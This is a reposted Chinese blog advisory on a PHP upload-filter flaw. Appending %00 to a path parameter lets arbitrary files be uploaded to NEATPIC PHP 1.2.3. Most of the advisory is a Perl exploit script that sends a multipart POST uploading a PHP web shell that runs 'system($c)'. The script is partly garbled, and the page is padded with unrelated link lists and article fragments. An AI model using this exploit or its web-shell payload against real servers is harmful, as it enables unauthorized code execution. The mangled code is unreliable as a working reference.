PHP网站警报,多种PHP程序过滤漏洞(转)

news/2024/5/9 15:53:34/文章来源:https://blog.csdn.net/cuanjun1153/article/details/100388313
PHP网站警报,多种PHP程序过滤漏洞(转)[@more@]

  危害:直接上传任意文件

  漏洞描述:

  当PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.

  测试程序:NEATPIC PHP目录直读版 1.2.3

  http://web.cncode.com/SoftView.asp?SoftID=1820

  此文档参与者:

  漏洞实验者:Xiaolu,Lilo,SuperHei,Darkness [All BST Members]

  Http://Www.Bugkidz.org

  Xiaolu提供了一个漏洞利用程序:

  #!/usr/bin/perl

  $

  = 1;

  use Socket;

  $host = "127.0.0.1";

  $port = "80";

  $UploadTo = "";

  $str =

  "-----------------------------7d41f4a600472 ".

  "Content-Disposition: form-data; name="path" ".

  " ".

  "./php.php%00 ".

  "-----------------------------7d41f4a600472 ".

  "Content-Disposition: form-data; name="image"; filename=

  "F: ools1.gif" ".

  "Content-Type: text/plain ".

  " ".

  ""system($c); ".

  "?> ".

  "-----------------------------7d41f4a600472-- ".

  " ";

  print $str;

  $len=length($str);

  print $len;

  $req ="POST /index.php?action=upload HTTP/1.1 ".

  "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

  application/msword, application/x-shockwave-flash, */* ".

  "Referer: http://127.0.0.1/index.php?path=. ".

  "Accept-Language: zh-cn ".

  "Content-Type: multipart/form-data; boundary=----------------

  -----------7d41f4a600472 ".

  "Accept-Encoding: gzip, deflate ".

  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT

  5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322) ".

  "Host: 127.0.0.1 ".

  "Content-Length: $len ".

  "Connection: Keep-Alive ".

  "Cache-Control: no-cache ".

  "Cookie: PHPSESSID=111111111111111111111111 ".

  " ".

  "$str ";

  print $req;

  @res = sendraw($req);

  print @res;

  #Hmm...Maybe you can send it by other way

  sub sendraw {

  my ($req) = @_;

  my $target;

  $target = inet_aton($host)

  die("inet_aton problems ");

  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')

  0)

  die("Socket problems ");

  if(connect(S,pack "SnA4x8",2,$port,$target)){

  select(S);

  $

  = 1;

  print $req;

  my @res = ;

  select(STDOUT);

  close(S);

  return @res;

  }

  else {

  die("Can't connect... ");

  }

  }

  

本文来自:http://www.linuxpk.com/30642.html

--&gtlinux电子图书免费下载和技术讨论基地

·上一篇:取得龙客联盟的文章管理系统的权限攻击

·下一篇:深入了解MicrosoftAccess安全性
 
     最新更新
·注册表备份和恢复

·低级格式化的主要作用

·如何防范恶意网站

·常见文件扩展名和它们的说明

·专家:警惕骇客骗局,严守企业信息

·PGPforWindows介紹基本设定(2)

·解剖安全帐号管理器(SAM)结构

·“恶作剧之王”揭秘

·绿色警戒

·黑客反击战

·网络四大攻击方法及安全现状描述

·可攻击3种浏览器代码流于互联网

·黑客最新的兴趣点,下个目标会是谁?

·“僵尸”——垃圾邮件的主要传播源

·Lebreat蠕虫惊现3变种

·POSTFIX反病毒反垃圾Ų…

·在FreeBSD上用PHP实现在线添加FTP用户

·简单让你在FreeBSDADSL上…

·安全版本:OpenBSD入门技巧解析

·Internet连接共享上网完全攻略

·关于ADSL上网网速常识

·静态缓存和动态缓存的比较

·最友好的SQL注入防御方法

·令网站提速的7大秘方

·网络基础知识大全

·路由基本知识

·端口映射的几种实现方法

·VLAN经典诠释

·问题分析与解决——ADSL错误代码

·问题分析——关于2条E1的线路绑定


关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-970190/,如需转载,请注明出处,否则将追究法律责任。

上一篇: 菜鸟必看:发布黑客最初步的技术(转)
下一篇: 深入了解MicrosoftAccess安全性(转)
user_pic_default.png
请登录后发表评论 登录
全部评论
<%=items[i].createtime%>

<%=items[i].content%>

<%if(items[i].items.items.length) { %>
<%for(var j=0;j
<%=items[i].items.items[j].createtime%> 回复

<%=items[i].items.items[j].username%>   回复   <%=items[i].items.items[j].tousername%>: <%=items[i].items.items[j].content%>

<%}%> <%if(items[i].items.total > 5) { %>
还有<%=items[i].items.total-5%>条评论) data-count=1 data-flag=true>点击查看
<%}%>
<%}%> <%}%>
RegisterForBlog
  • 博文量
    297
  • 访问量
    1578949

最新文章

  • eTrust全方位实现安全管理(转)
  • 电子支付与安全的关系及其经济分析二(转)
  • 电子支付与安全的关系及其经济分析三(转)
  • 让个人电脑也拥有一把保护伞—个人防火墙(转)
  • 整体大于部分之和—ServGate的整合安全(转)
  • 识破病毒的“障眼法”进一步防御病毒(转)
  • 实验室环境下测试千兆入侵检测系统(转)
  • 病毒肆虐信息安全问题不容忽视(转)
  • 覆盖*printf()系列函数本身的返回地址(转)
  • 中国信息安全体系机构基本框架与构想(转)

转载于:http://blog.itpub.net/10763080/viewspace-970190/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_854372.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

防止恶意解析——禁止通过IP直接访问网站

一、什么是恶意解析一般情况下&#xff0c;要使域名能访问到网站需要两步&#xff0c;第一步&#xff0c;将域名解析到网站所在的主机&#xff0c;第二步&#xff0c;在web服务器中将域名与相应的网站绑定。但是&#xff0c;如果通过主机IP能直接访问某网站&#xff0c;那么把域…

Nginx 通过 certbot 为网站自动配置 SSL 证书并续期

一、背景知识 1.1、http 和 https 是什么&#xff1f; 简单来说&#xff0c;http 是一个传输网页内容的协议&#xff0c;比如你看到的 http 开头的网站 http://www.163.com &#xff0c;其网页上的文字、图片、 CSS 、 JS 等文件都是通过 http 协议传输到我们的浏览器&#xff…

详细的图文介绍如何利用XAMPP本地建站的环境配置教程

WordPress 是一个简便快捷&#xff0c;用途广&#xff0c;人气旺的一个开源的博客建站程序。很有很多等您去发现。 简便快捷&#xff1a;在性能上易于操作、易于浏览&#xff1b; 用途广&#xff1a;可以建博客&#xff0c;可以建企业的官网等等。 人气旺&#xff1a;这个好处就…

php或js判断网站访问者来自手机或者pc端源码

很多时候也可以通过逻辑程序来进行判断&#xff0c;如PHP、JS是常用的两种识别访问设备类型的常用方法。 原理都是采用识别访问客户端的HTTP_USER_AGENT&#xff0c;然后进行关键字匹配进行确定设备类型&#xff0c;对于伪造HTTP头的就区分不出来了。 区分设备类型然后要做的就…

SQL注入全过程,含实例初步注入--绕过验证,直接登录安全较低公司网站登陆框如下:可以看到除了账号密码之外

SQL注入全过程,含实例 初步注入--绕过验证&#xff0c;直接登录 公司网站登陆框如下&#xff1a; 可以看到除了账号密码之外&#xff0c;还有一个公司名的输入框&#xff0c;根据输入框的形式不难推出SQL的写法如下&#xff1a;   SELECT * From Table WHERE NameXX and Pass…

使用libsvm对政府网站访问数据的分析和预测

创新性 选取题材&#xff0c;政府网站访问数据。想通过使用人工智能的方法&#xff0c;根据已有数据建立模型&#xff0c;对新的访问数据进行鉴别&#xff0c;区分网站访问是否为正常访问&#xff0c;从而进行一些业务处理。更进一步&#xff0c;预测哪些是危险访问&#xff0…

看透 Spring MVC 源代码分析与实践——网站基础知识

每天都会分享Java架构文章&#xff0c;喜欢的朋友关注我。ps&#xff1a;文末有彩蛋&#xff0c;惊喜等着你 网站架构及其演变过程 基础结构 网络传输分解方式&#xff1a; 标准的 OSI 参考模型TCP/IP 参考模型海量数据的解决方案 缓存和页面静态化缓存通过程序直接保存在内…

用户在电商网站中购买成功了,那么在微服务中经历了什么?

当我傻啊&#xff0c;用户在电商网站购买成功&#xff0c;还在微服务中&#xff0c;那肯定就是有一套微服务架构的电商系统。 设计一套电商系统还不简单 简单想象一下&#xff0c;既然是一个电商系统&#xff0c;有用户去购买&#xff0c;就肯定得有一个用户模块&#xff0c;…

JAVA爬取网站查询网络IP所在地

JAVA爬取网站查询网络IP所在地 网络中我们上网都是一个ip地址&#xff0c;在获取对象网络ip的时候&#xff0c;如果想查询他所在网络的地址怎么搞呢&#xff1f;上代码 1.写一个方法通过站长工具网站查询到你输入的ip的地址&#xff0c;需要用URL去爬取网站数据 /**ip就是需要…

建站技术是一锤子买卖,而建站服务则是长久性的共赢吗?

近年来&#xff0c;服务外包需要越来越多&#xff0c;业务也越来越多样化&#xff0c;特别是IT服务外包。随着资本市场的进入&#xff0c;人力成本的提升&#xff0c;素质教育与实际工作环境的脱钩&#xff0c;可谓是一将难求&#xff0c;所以很多公司或单位开始将目光关注到第…

手机微信小程序公众号交友平台网站定制开发,相亲网站系统建设,婚恋相亲网站制作

10几年的技术团队&#xff0c;专业定制交友网站开发&#xff0c;交友平台网站建设&#xff0c;婚恋网站平‌‌‌‌台开发建设&#xff0c;可仿百合网&#xff0c;世纪佳缘网&#xff0c;支持电脑版手机版微信版小程序版APP版&#xff0c;由10年的技术团队专业定制&#xff0c;需…

网站站内、站外链接优化技巧与作用

其实网站站内链接优化和站外链接优化一样重要&#xff0c;两者是相辅相成的&#xff0c;可能在对不同的搜索引擎的时候有些不一样&#xff0c;在相同条件下百度更加注重的是内容&#xff0c;谷歌更加注重的是链接&#xff0c;所以这两个都要同时做好才能让网站对搜索引擎更加友…

国际版云购网站代码开发实现案例

最近把之前的中文版元购夺宝网站做了改变&#xff0c;感觉还是比较不错的&#xff0c;算是高大上国际版云购网站代码开发实现案例&#xff0c;现在分享给大家看看。 预览效果图&#xff1a; function is_php($version 5.0.0){static $_is_php;$version (string)$version;if …

Google有三个.cn网站可以访问了,但它们只面向开发者

12 月 8 日&#xff0c;Google 在北京举办了一场规模空前的开发者活动&#xff0c;推出了三个不需科学上网就能访问的子站点。 developers.google.cn firebase.google.cn developer.android.google.cn 虽然 Google 早在 2010 年就正式退出了中国市场&#xff0c;但它在开发者…

Nginx之坑:完全理解location中的index,配置网站初始页

文章目录index指令的作用index指令详解基本内容&#xff08;中文文档和官方文档都可见&#xff09;&#xff1a;核心内容&#xff08;中文文档没有或一笔带过&#xff0c;而官方文档作详细解释&#xff09;&#xff1a;实例Nginx中文文档Nginx官方文档吐槽index指令的作用 在前…

2019fresco依赖_在2019年建立一个无依赖网站

我的新改进个人网站的屏幕截图 经过几年的基本无视后&#xff0c;我最近决定是时候刷新我的个人站点了 。 先前的迭代结合了Gulp和Bower&#xff0c;并结合了Susy&#xff08;网格系统的Sass库&#xff09;&#xff08;版本2&#xff0c;而不是最新的版本3&#xff09;。 我上一…

2007最牛X网站收集

50. 经典桌面 这个名叫东子的偏执狂不知花了多少工夫&#xff0c;mydeskcity.com的内容量达到了40G&#xff0c;很多图片都是站长本人在国外搜集后&#xff0c;自己进行加工的作品。 http://www.mydeskcity.com/ 49. 画猪头 在指定的对话框里面随便画一个猪头&#…

纯css实现网站导航条下拉效果

不用javascript效果实现导航条的下拉效果。 纯css属性实现&#xff0c;主要应用到绝对定位中的left&#xff1a;auto和 left&#xff1a;-9999px&#xff1b;来隐藏或者鼠标经过的时候显示下拉菜单。 下面是代码&#xff1a; <!DOCTYPE html> <html> <head&g…

网站右侧导航条的玩法

最近心情很不好&#xff0c;各种工作生活上面的事情&#xff0c;让我很是受伤&#xff0c;刚出来工作感觉程序员确实是个神奇的行业&#xff0c;一个个都觉得自己的智商挺高的&#xff0c;哎&#xff0c;每天起早贪黑的上下班&#xff0c;还天天受气&#xff0c;真是日了够了&a…

谷歌浏览器调试网站技巧教程

1.样式的调试&#xff0c;盒子模型。 2找到hover样式 3 4.样式所对应的标签&#xff0c;所在文件名